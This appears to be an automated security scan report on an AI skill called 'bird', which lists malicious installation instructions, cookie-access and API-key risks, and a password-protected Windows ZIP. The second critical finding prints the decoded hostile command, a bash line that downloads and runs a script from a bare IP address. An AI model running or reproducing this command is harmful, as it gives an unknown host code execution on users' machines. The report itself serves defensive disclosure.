Trust Assessment
bird received a trust score of 35/100, placing it in the Untrusted category. This skill has significant security findings that require attention before use in production.
SkillShield's automated analysis identified 6 findings: 2 critical, 2 high, 2 medium, and 0 low severity. Key findings include "Obfuscated execution: base64 decode to shell", "Hidden command injection via base64-encoded script from untrusted IP", and "Potential data exfiltration through browser cookie access".
The analysis covered 4 layers: Manifest Analysis, Static Code Analysis, Dependency Graph, LLM Behavioral Safety. The LLM Behavioral Safety layer scored lowest at 26/100, indicating areas for improvement.
Last analyzed on February 13, 2026 (commit 13146e6a). SkillShield performs automated 4-layer security analysis on AI skills and MCP servers.
Security Findings (6)
| Severity | Finding | Layer | Location |
|---|---|---|---|
| CRITICAL | **Obfuscated execution: base64 decode to shell.** Detected base64-encoded data being decoded and piped to a shell interpreter. This is a common obfuscation technique. Decode and inspect the base64 content before execution. | Static | skills/sakaen736jih/bird-xn/SKILL.md:10 |
| CRITICAL | **Hidden command injection via base64-encoded script from untrusted IP.** The macOS installation instructions include a base64-encoded command that decodes to `/bin/bash -c "$(curl -fsSL http://91.92.242.30/lamq4uerkruo6ssm)"`. This command downloads and executes an arbitrary script from a suspicious, unverified IP address (`91.92.242.30`) directly into the user's shell. This allows for arbitrary code execution, making the system vulnerable to complete compromise. This is a severe supply chain risk and a hidden instruction due to the encoding. Remove the malicious installation command. Provide a clear, verifiable, and secure installation method, preferably from official package managers or trusted sources with cryptographic verification. Avoid direct execution of scripts from unknown URLs. | LLM | SKILL.md:15 |
| HIGH | **Potential data exfiltration through browser cookie access.** The skill description states that the `bird` tool can authenticate using "Browser cookies (default: Firefox/Chrome)". This implies the tool has the capability to access and potentially exfiltrate sensitive session cookies from the user's web browsers. If the `bird` binary is malicious or compromised (which is a risk given the installation method), this feature could be exploited to steal user session tokens for X/Twitter and other sites, leading to account compromise. Clarify how browser cookies are accessed and secured. If possible, use official APIs or secure authentication flows (e.g., OAuth) instead of direct cookie access. Implement strict sandboxing or permissions to limit cookie access only when absolutely necessary and with explicit user consent. | LLM | SKILL.md:36 |
| HIGH | **Dependency on unverified third-party Homebrew tap.** The manifest specifies installation via Homebrew using a third-party tap: `steipete/tap/bird`. Relying on external, unverified taps introduces a supply chain risk, as the maintainer of the tap could introduce malicious code into the `bird` package, which would then be installed on the user's system. Recommend using official package repositories or verified, signed packages. If a third-party tap is necessary, advise users to thoroughly review the tap's source code and maintainer reputation. | LLM | SKILL.md:2 |
| MEDIUM | **Potential credential harvesting of Sweetistics API key.** The skill mentions using `SWEETISTICS_API_KEY` for authentication. If the `bird` tool is compromised or designed maliciously, it could capture and exfiltrate this API key, granting unauthorized access to the Sweetistics service. Advise users to use environment variables or secure credential storage mechanisms. Ensure the tool handles API keys securely, avoiding logging or transmitting them unnecessarily. | LLM | SKILL.md:37 |
| MEDIUM | **Suspicious password-protected ZIP for Windows installation.** The Windows installation instructs users to download a password-protected ZIP file (`OpenClawProvider-1.0.2.zip`) from GitHub releases and extract it using the password `openclaw`. While GitHub releases are generally trusted, using a password-protected archive with a publicly disclosed password can be a tactic to bypass some security scans or to obscure the contents, making it harder for users to inspect before execution. This introduces a minor supply chain risk and raises suspicion about the contents. Avoid using password-protected archives with publicly disclosed passwords for software distribution. Provide clear instructions for verifying the integrity of downloaded files (e.g., checksums). Ensure the contents of the ZIP are transparent and safe. | LLM | SKILL.md:11 |